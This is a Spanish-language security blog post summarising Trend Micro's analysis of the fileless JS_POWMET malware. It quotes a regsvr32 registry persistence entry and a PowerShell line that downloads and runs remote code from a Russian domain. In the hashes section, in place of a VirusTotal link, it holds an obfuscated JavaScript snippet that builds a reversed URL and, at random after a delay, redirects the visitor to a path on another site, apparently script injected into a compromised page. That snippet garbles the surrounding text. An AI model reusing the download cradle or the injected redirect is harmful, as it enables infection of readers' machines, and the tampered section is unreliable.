JSPOWMET: MALWARE “FILELESS” QUE NO SE COPIA AL DISCO DURO

JS_ POWMET: Malware sin malware

El pasado 24 de julio el equipo de Trend Micro anunciaba la detección de JS_POWMET, un malware completamente “fileless” que realiza toda su actividad desde la memoria, sin escribir ni dejar rastro en el disco duro de la víctima.

 

¿QUÉ ES EL MALWARE “FILELESS”?

Fileless malware, o malware sin ficheros, es un tipo de malware que se instala y se ejecuta en memoria. No necesita escribir ningún dato en el disco duro de la víctima para ejecutar su payload, lo que dificulta enormemente su detección.

Este tipo de familias se conocen como “Advanced Volatile Threats (AVT)” y suelen estar orientadas al robo de información valiosa y propiedad intelectual de empresas, bancos y gobiernos.

ANTECEDENTES

Este concepto de malware “sin ficheros” no es nuevo. De hecho el primer “fileless malware” data de 1987: conocido como Lehigh, infectaba el fichero COMMAND.COM y se instalaba en la memoria. Desde allí buscaba otros ficheros COMMAND.COM y los infectaba. Cuando había realizado cuatro infecciones sobreescribía el sector de arranque y la tabla de asignación de archivos.

La mayoría de esta clase de virus terminan realizando algún tipo de escritura en disco cuando ejecutan su payload. Son sólo “fileless” durante la fase de infección.

JS_POWMET sin embargo no realiza ninguna escritura durante su ciclo de vida, lo que lo hace particularmente interesante.

CÓMO FUNCIONA JS_POWMET

El virus llega al sistema a través de un malware intermedio que añade una entrada al registro de arranque de Windows:

 

Ík

 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
COM+ = “regsvr32 /s /n /u /i:{URL al XML malicioso} scrobj.dll”

Este comando ejecutará cada vez que se inicie la máquina un Javascript malicioso contenido en un XML remoto, sin necesidad de guardarlo en el disco duro.

Una vez ejecutado, JS_POWMET descargará el fichero “TROJ_PSINJECT”, un script para Powershell que descargará y desencriptará otro fichero: “favicon” desde la URL https://bogerando.ru/favicon.

 

%System%\WindowsPowerShell\v1.0\powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString(‘https://{BLOCKED}ndo.ru/p1’));

 

Una vez descifrado, el fichero “favicon” se inyectará por medio de “ReflectivePELoader” en el proceso “TROJ_PSINJECT”, todo esto sin guardar ningún fichero al disco duro.

A continuación el malware volverá a descifrar el fichero “favicon” utilizando una clave RC4 hardcodeada en el código del virus. Esto da lugar a una nueva DLL maliciosa, “BKDR_ANDROM” que se inyectará en el proceso que ejecuta Powershell.

BKDR_ANDROM recopilará información sensible sobre el sistema y la enviará al C&C antes de cerrar todos los procesos powershell.exe y borrar todo rastro del virus.

CONTRAMEDIDAS

Como contramedidas se propone utilizar sistemas basados en contenedores en los puntos más críticos de la red.

 

Ver información original al respecto en Fuente

 

MAS INFORMACION DE LOS HASH DE LOS FICHEROS RELACIONADOS

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/e27f417b96a33d8449f6cf00b8306160e2f1b845ca2c9666081166620651a3ae/analysis/” target=”_blank” rel=”noopener”>e27f417b96a33d8449f6cf00b8306160e2f1b845ca2c9666081166620651a3ae (JS_POWMET.DE)

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con
info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies